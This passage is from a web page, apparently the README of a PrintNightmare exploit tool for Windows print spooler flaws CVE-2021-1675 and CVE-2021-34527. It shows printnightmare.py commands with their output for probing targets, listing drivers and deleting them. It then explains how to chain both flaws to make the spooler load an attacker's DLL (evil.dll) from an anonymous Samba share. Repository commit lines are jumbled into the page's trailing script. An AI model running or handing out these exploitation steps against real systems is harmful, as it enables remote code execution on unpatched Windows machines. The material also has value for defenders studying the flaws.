Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\F</span>XSUI.DLL
Version: <span class="m">3</span>
----------------------------------------------------------------
Name: Microsoft enhanced Point and Print compatibility driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\u</span>nishare.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\P</span>rintConfig.dll
Version: <span class="m">3</span>
----------------------------------------------------------------
</code></pre></div>
<h4 id="check-if-target-is-vulnerable">Check if target is vulnerable</h4>
<h5 id="unpatched-windows-10">Unpatched Windows 10</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -check <span class="s1">&#39;user:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Target appears to be vulnerable!
</code></pre></div>
<h5 id="patched-windows-server-2022">Patched Windows Server 2022</h5>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -check <span class="s1">&#39;user:Passw0rd@172.16.19.135&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>!<span class="o">]</span> Target does not appear to be vulnerable
</code></pre></div>
<h4 id="list-current-printer-drivers">List current printer drivers</h4>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -list <span class="s1">&#39;user:Passw0rd@172.16.19.135&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Enumerating printer drivers
Name: Microsoft XPS Document Writer v4
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_075615bee6f80a8d<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms001.inf_amd64_8bc7809b71930efc<span class="se">\M</span>XDW.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_c9865835eff4a608<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: Microsoft Print To PDF
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\n</span>tprint.inf_amd64_075615bee6f80a8d<span class="se">\A</span>md64<span class="se">\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms009.inf_amd64_6dc3549941ff1a57<span class="se">\M</span>PDW-PDC.xml
Config file: C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\D</span>riverStore<span class="se">\F</span>ileRepository<span class="se">\p</span>rnms003.inf_amd64_c9865835eff4a608<span class="se">\A</span>md64<span class="se">\P</span>rintConfig.dll
Version: <span class="m">4</span>
----------------------------------------------------------------
Name: Microsoft enhanced Point and Print compatibility driver
Environment: Windows x64
Driver path: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\m</span>xdwdrv.dll
Data file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\u</span>nishare.gpd
Config file: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\s</span>pool<span class="se">\D</span>RIVERS<span class="se">\x</span><span class="m">64</span><span class="se">\3\P</span>rintConfig.dll
Version: <span class="m">3</span>
----------------------------------------------------------------
</code></pre></div>
<h4 id="delete-printer-driver">Delete printer driver</h4>
<p>May require administrative privileges.</p>
<div class="codehilite"><pre><span></span><code>$ ./printnightmare.py -delete -name <span class="s1">&#39;Microsoft XPS Document Writer v5&#39;</span> <span class="s1">&#39;administrator:Passw0rd@172.16.19.128&#39;</span>
Impacket v0.9.23 - Copyright <span class="m">2021</span> SecureAuth Corporation
<span class="o">[</span>*<span class="o">]</span> Deleted printer driver!
</code></pre></div>
<h2 id="details">Details</h2>
<p>PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527. </p>
<h3 id="cve-2021-1675">CVE-2021-1675</h3>
<p>A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return <code>RPC_E_ACCESS_DENIED</code> (Code: <code>0x8001011b</code>) if a non-administrator tries to add a new printer driver. </p>
<h3 id="cve-2021-34527">CVE-2021-34527</h3>
<p>When <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b">adding a new printer driver</a>, the <code>pDataFile</code> parameter in the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/3a3f9cf7-8ec4-4921-b1f6-86cf8d139bc2">DRIVER_CONTAINER</a> allows UNC paths. The DLL specified in <code>pDataFile</code> will however <strong>not</strong> be loaded, <em>but</em> it will get copied over to a local path allowing us to create a new printer driver with the <code>pConfigFile</code> parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return <code>ERROR_INVALID_PARAMETER</code> (Code: <code>0x57</code>)</p>
<h3 id="combining-the-pieces">Combining the pieces</h3>
<p>Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.</p>
<p>For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.</p>
<p>When creating a new printer driver, the DLL in the <code>pDataFile</code> parameter will <strong>not</strong> be loaded for security reasons. However, it <em>will</em> be copied over to <code>C:\Windows\system32\spool\drivers\x64\3\</code>. Then, we could create a new printer driver that uses <code>pConfigFile</code> (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to <code>C:\Windows\system32\spool\drivers\x64\3\old\&lt;I&gt;\</code>, where <code>&lt;I&gt;</code> is incremented for each DLL. Now we can create a third printer driver that will use the local path <code>C:\Windows\system32\spool\drivers\x64\3\old\&lt;I&gt;\</code>, since the DLL is no longer used. Now it's just a matter of guessing <code>&lt;I&gt;</code> which will start incrementing from <code>1</code>.</p>
<p>Note that the DLL will keep its filename locally, so if you initially run the exploit with <code>foo.dll</code> and it gets saved to <code>C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll</code> and you then change the contents of <code>foo.dll</code> locally and run the exploit again and it now gets saved to <code>C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll</code>, then the original <code>foo.dll</code> will be used since it is located in <code>C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll</code>. Instead, simply change the filename if you change the contents of the DLL.</p>
<h4 id="smb-and-unc">SMB and UNC</h4>
<p>In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path <code>\\10.0.0.2\files\foo.txt</code> is a file <code>foo.txt</code> that is served from the <code>files</code> share of the server <code>10.0.0.2</code>. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the <code>Samba</code> package.</p>
<p>To install <code>Samba</code> with <code>apt</code>:</p>
<div class="codehilite"><pre><span></span><code>$ sudo apt install samba
</code></pre></div>
<p>Edit the <code>/etc/samba/smb.conf</code> and add the following at the end of the file:</p>
<div class="codehilite"><pre><span></span><code><span class="k">[smb]</span><span class="w"></span>
<span class="w"> </span><span class="na">comment</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">Samba</span><span class="w"></span>
<span class="w"> </span><span class="na">path</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">/tmp/share</span><span class="w"></span>
<span class="w"> </span><span class="na">guest ok</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">yes</span><span class="w"></span>
<span class="w"> </span><span class="na">read only</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">yes</span><span class="w"></span>
<span class="w"> </span><span class="na">browsable</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">yes</span><span class="w"></span>
<span class="w"> </span><span class="na">force user</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">nobody</span><span class="w"></span>
</code></pre></div>
<p>This will create a new share called <code>smb</code> and serve the files inside <code>/tmp/share</code>. It allows for anonymous access, and the local user <code>nobody</code> will be used to browse the files.</p>
<p>Then start the Samba service by doing:</p>
<div class="codehilite"><pre><span></span><code>$ sudo service smbd start
</code></pre></div>
<p>Suppose your Linux machine has the IP <code>192.168.1.100</code> and you wish to serve the <code>evil.dll</code>, then the UNC path in this scenario will be <code>\\192.168.1.100\smb\evil.dll</code>. </p>
<h2 id="authors">Authors</h2>
<ul>
<li><a href="https://github.com/ly4k">@ly4k</a></li>
</ul>
<h2 id="credits">Credits</h2>
<ul>
<li><a href="https://github.com/cube0x0">@cube0x0</a>'s <a href="https://github.com/cube0x0/CVE-2021-1675">implementation</a></li>
<li><a href="https://github.com/SecureAuthCorp/impacket">Impacket</a></li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
Added settings.toml
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
init
2022-09-02 09:05:59 +02:00
if (obj.open) {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('open');
init
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
Added settings.toml
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
init
2022-09-02 09:05:59 +02:00
} else {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
init
2022-09-02 09:05:59 +02:00
</script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
init
2022-09-02 09:05:59 +02:00
<script type="text/x-mathjax-config">
Added settings.toml
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
init
2022-09-02 09:05:59 +02:00
</body>
</html>